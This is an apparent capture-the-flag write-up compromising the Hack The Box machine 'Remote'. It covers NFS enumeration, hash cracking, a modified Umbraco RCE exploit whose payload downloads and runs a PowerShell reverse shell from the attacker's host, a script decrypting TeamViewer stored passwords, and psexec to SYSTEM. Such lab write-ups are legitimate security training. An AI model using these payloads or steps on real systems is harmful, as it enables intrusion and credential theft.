Remote
Enumeration
As usual, we start with an nmap scan, in order to find open ports in the target machine.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.180 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Thu Mar 17 20:30:07 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.180
Nmap scan report for 10.10.10.180
Host is up (0.31s latency).
Not shown: 65528 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
111/tcp open rpcbind
135/tcp open msrpc
445/tcp open microsoft-ds
2049/tcp open nfs
49666/tcp open unknown
# Nmap done at Thu Mar 17 20:30:34 2022 -- 1 IP address (1 host up) scanned in 26.91 secondsAs we see, there quite a few ports are open. Let's try to obtain more information about the services and versions running on those ports.
nmap -sC -sV -p21,80,111,135,445,2049,49666 10.10.10.180 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.92 scan initiated Thu Mar 17 20:34:10 2022 as: nmap -sCV -p21,80,111,135,445,2049,49666 -Pn -oN targeted 10.10.10.180
Nmap scan report for 10.10.10.180
Host is up (0.046s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
49666/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-03-17T19:35:10
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 17 20:36:19 2022 -- 1 IP address (1 host up) scanned in 128.70 secondsLet's take a look at the website.
Not much going on. Let's enumerate directories with gobuster.
gobuster dir -u http://10.10.10.180 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200
direnumerates directories or files.-uthe target URL.-wpath to the wordlist.-tnumber of current threads, in this case 200 threads.
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.180
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404,500
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/03/18 15:30:01 Starting gobuster in directory enumeration mode
===============================================================
/blog (Status: 200) [Size: 5001]
/products (Status: 200) [Size: 5328]
/contact (Status: 200) [Size: 7880]
/home (Status: 200) [Size: 6703]
/people (Status: 200) [Size: 6739]
/Home (Status: 200) [Size: 6703]
/Products (Status: 200) [Size: 5338]
/Contact (Status: 200) [Size: 7890]
/install (Status: 302) [Size: 126] [--> /umbraco/]
/Blog (Status: 200) [Size: 5011]
/about-us (Status: 200) [Size: 5451]
/People (Status: 200) [Size: 6749]
/INSTALL (Status: 302) [Size: 126]
===============================================================
2022/03/18 15:33:47 Finished
===============================================================If we take at look a the /install directory, which redirects to the /umbraco/ directory, we'll see a login page.
If we search for common umbraco exploits with the searchsploit tool, we'll see that there is one which allow us to execute commands remotely, but we need some valid credentials to use it.
searchsploit umbraco
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Umbraco CMS - Remote Command Execution (Metasploit) | windows/webapps/19671.rb
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution | aspx/webapps/46153.py
Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated) | aspx/webapps/49488.py
Umbraco CMS 8.9.1 - Directory Traversal | aspx/webapps/50241.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting | php/webapps/44988.txt
Umbraco v8.14.1 - 'baseUrl' SSRF | aspx/webapps/50462.txt
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No ResultsExploitation
Nmap reported that port 2049 is open. This is the default port for NFS (Network File System). Let's try to see if there is any mount available.
showmount -e 10.10.10.180
-eshow the NFS server's export list.
Export list for 10.10.10.180:
/site_backups (everyone)Let's create a directory in which we'll be mounting the NFS.
mkdir nfs
Now, let's mount the NFS into the previous folder.
mount -t nfs 10.10.10.180:/site_backups nfs/
-tlimit the set of filesystem types.
If we take a look at the nfs folder, we'll see a bunch of directories related to the web page.
ls -ll nfs/
total 115
drwx------ 2 nobody 4294967294 64 Feb 20 2020 App_Browsers
drwx------ 2 nobody 4294967294 4096 Feb 20 2020 App_Data
drwx------ 2 nobody 4294967294 4096 Feb 20 2020 App_Plugins
drwx------ 2 nobody 4294967294 64 Feb 20 2020 aspnet_client
drwx------ 2 nobody 4294967294 49152 Feb 20 2020 bin
drwx------ 2 nobody 4294967294 8192 Feb 20 2020 Config
drwx------ 2 nobody 4294967294 64 Feb 20 2020 css
-rwx------ 1 nobody 4294967294 152 Nov 1 2018 default.aspx
-rwx------ 1 nobody 4294967294 89 Nov 1 2018 Global.asax
drwx------ 2 nobody 4294967294 4096 Feb 20 2020 Media
drwx------ 2 nobody 4294967294 64 Feb 20 2020 scripts
drwx------ 2 nobody 4294967294 8192 Feb 20 2020 Umbraco
drwx------ 2 nobody 4294967294 4096 Feb 20 2020 Umbraco_Client
drwx------ 2 nobody 4294967294 4096 Feb 20 2020 Views
-rwx------ 1 nobody 4294967294 28539 Feb 20 2020 Web.configIf you inspect the nfs/ folder, we'll end up finding the umbraco.sfd file inside the App_Data folder.
ls -ll nfs/App_Data
total 1969
drwx------ 2 nobody 4294967294 64 Feb 20 2020 cache
drwx------ 2 nobody 4294967294 4096 Feb 20 2020 Logs
drwx------ 2 nobody 4294967294 4096 Feb 20 2020 Models
drwx------ 2 nobody 4294967294 64 Feb 20 2020 packages
drwx------ 2 nobody 4294967294 4096 Feb 20 2020 TEMP
-rwx------ 1 nobody 4294967294 36832 Feb 20 2020 umbraco.config
-rwx------ 1 nobody 4294967294 1965978 Feb 20 2020 Umbraco.sdfWe can see that it is a binary file.
cat nfs/App_Data/Umbraco.sdf
File: nfs/App_Data/Umbraco.sdf <BINARY>If we search for admin in the file with the strings tool, we'll find an email and a password hash.
strings nfs/App_Data/Umbraco.sdf | grep admin
[...]
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
[...]Let's see if we can get the password for that hash with crackstation.
And we get the baconandcheese password. Now that we've got some valid credentials, we can use the exploit we found earlier with searchsploit.
searchsploit -m aspx/webapps/46153.py
Exploit: Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution
URL: https://www.exploit-db.com/exploits/46153
Path: /usr/share/exploitdb/exploits/aspx/webapps/46153.py
File Type: Python script, ASCII text executable
Copied to: /home/alfa8sa/HTB/machines/remote/46153.pyBefore executing it, we'll have to change a few things. First we'll have to change the login variable to admin@htb.local, the password variable to baconandcheese, and the host variable to http://10.10.10.180.
nano 46153.py
login = "adminadmin@htb.local";
password="baconandcheese";
host = "http://10.10.10.180";Then we'll have to change the payload variable, so it will send us back a reverse shell. But first, we'll have to copy the Invoke-PowerShellTcp.ps1 file from Nishang to our current directory.
cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 rev.ps1
And then open it and paste the following line at the end of the file.
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.19 -Port 4444And then set an HTTP server on the current directory with python.
python -m http.server 80
Then, back to the python script, in the payload variable, we'll have to change it, so it will download and import the rev.ps1 file, and when it is executed, it will send us the reverse shell.
payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "/c powershell IEX(New-Object Net.WebClient).downloadString(\'http://10.10.14.19/rev.ps1\'); System.Diagnostics.Process proc = new System.Diagnostics.Process();\
proc.StartInfo.FileName = "cmd.exe"; proc.StartInfo.Arguments = cmd;\
proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
</msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
</xsl:template> </xsl:stylesheet> ';Finally, let's set a netcat listener on port 4444.
rlwrap nc -lvnp 4444
-llisten mode.-vverbose mode.-nnumeric-only IP, no DNS resolution.-pspecify the port to listen on.
Now, if we execute the python script, we should get a reverse shell as the iis apppool\defaultapppool user, and we cloud grab the user flag.
listening on [any] 4444 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.180] 49703
Windows PowerShell running as user REMOTE$ on REMOTE
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
whoami
iis apppool\defaultapppool
type \users\public\user.txt
6d0c411c9accbbe995751f83645e54d1Privilege Escalation
If we list the processes running on the local machine, we'll see that TeamViewer is being executed.
tasklist
Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
System Idle Process 0 0 8 K
System 4 0 140 K
Registry 88 0 20,108 K
smss.exe 292 0 1,244 K
csrss.exe 372 0 5,208 K
wininit.exe 480 0 6,856 K
csrss.exe 496 1 4,712 K
winlogon.exe 544 1 16,440 K
services.exe 612 0 7,880 K
lsass.exe 632 0 13,672 K
svchost.exe 732 0 13,660 K
fontdrvhost.exe 752 0 3,908 K
fontdrvhost.exe 760 1 4,200 K
svchost.exe 844 0 9,896 K
dwm.exe 936 1 37,272 K
svchost.exe 972 0 59,996 K
svchost.exe 312 0 15,084 K
svchost.exe 316 0 17,164 K
svchost.exe 364 0 16,912 K
svchost.exe 1036 0 19,164 K
svchost.exe 1120 0 22,272 K
vm3dservice.exe 1236 0 6,548 K
svchost.exe 1440 0 8,696 K
svchost.exe 1580 0 16,796 K
spoolsv.exe 1596 0 16,248 K
svchost.exe 1804 0 10,652 K
svchost.exe 2060 0 26,804 K
svchost.exe 2080 0 11,784 K
inetinfo.exe 2104 0 15,192 K
svchost.exe 2164 0 8,288 K
TeamViewer_Service.exe 2228 0 19,268 K
VGAuthService.exe 2256 0 10,548 K
vmtoolsd.exe 2280 0 17,692 K
svchost.exe 2296 0 7,372 K
svchost.exe 2312 0 12,276 K
MsMpEng.exe 2404 0 170,252 K
nfssvc.exe 2412 0 5,264 K
svchost.exe 2536 0 12,124 K
dllhost.exe 3132 0 13,384 K
WmiPrvSE.exe 3264 0 18,532 K
LogonUI.exe 3468 1 45,868 K
msdtc.exe 3536 0 10,156 K
SearchIndexer.exe 4204 0 18,212 K
svchost.exe 776 0 12,864 K
w3wp.exe 1372 0 298,748 K
svchost.exe 4992 0 6,204 K
cmd.exe 472 0 3,712 K
conhost.exe 2132 0 12,272 K
powershell.exe 4084 0 126,344 K
tasklist.exe 2684 0 7,588 KIf we check on the C:\Program Files (x86)\TeamViewer directory, we'll see that it is using version 7.
dir \progra~2\TeamViewer
Directory: C:\Program Files (x86)\TeamViewer
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/27/2020 10:35 AM Version7There is a Metasploit script coded in ruby, which can break the TeamViewer passwords. All we need is the password hash, and we can find it in the HKLM:\SOFTWARE\WOW6432Node\TeamViewer\Version7 registry. This registry has the SecurityPasswordAES property which contains the password hash.
(Get-ItemProperty HKLM:\SOFTWARE\WOW6432Node\TeamViewer\Version7).SecurityPasswordAES
255
155
28
115
214
107
206
49
172
65
62
174
19
27
70
79
88
47
108
226
209
225
243
218
126
141
55
107
38
57
78
91As I don't like to use Metasploit, I made a python script which breaks this hash and give us the password.
from Crypto.Cipher import AES
key = b"\x06\x02\x00\x00\x00\xa4\x00\x00\x52\x53\x41\x31\x00\x04\x00\x00"
iv = b"\x01\x00\x01\x00\x67\x24\x4F\x43\x6E\x67\x62\xF2\x5E\xA8\xD7\x04"
decipher = AES.new(key, AES.MODE_CBC, iv)
ciphertext = bytes([255, 155, 28, 115, 214, 107, 206, 49, 172, 65, 62, 174, 19, 27, 70, 79, 88, 47, 108, 226, 209, 225, 243, 218, 126, 141, 55, 107, 38, 57, 78, 91])
plaintext = decipher.decrypt(ciphertext).decode()
print(plaintext)If we execute it, we'll get the !R3m0te! password.
python passwd.py
!R3m0te!Now we can check with crackmapexec if it is the administrator password.
crackmapexec smb 10.10.10.180 -u 'Administrator' -p "\!R3m0te\!"
SMB 10.10.10.180 445 REMOTE [*] Windows 10.0 Build 17763 x64 (name:REMOTE) (domain:remote) (signing:False) (SMBv1:False)
SMB 10.10.10.180 445 REMOTE [+] remote\Administrator:!R3m0te! (Pwn3d!)And we can verify that the password is valid. Finally, let's get a shell as the nt authority\system user with psexec. Then, all we have to do is reap the harvest and take the root flag.
impacket-psexec Administrator:"\!R3m0te\!"@10.10.10.180
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.10.180.....
[*] Found writable share ADMIN$
[*] Uploading file SliGWDPW.exe
[*] Opening SVCManager on 10.10.10.180.....
[*] Creating service gnjn on 10.10.10.180.....
[*] Starting service gnjn.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> type \users\administrator\desktop\root.txt
f5f08ce4e749219167bb2e08abe2283bLast updated
Was this helpful?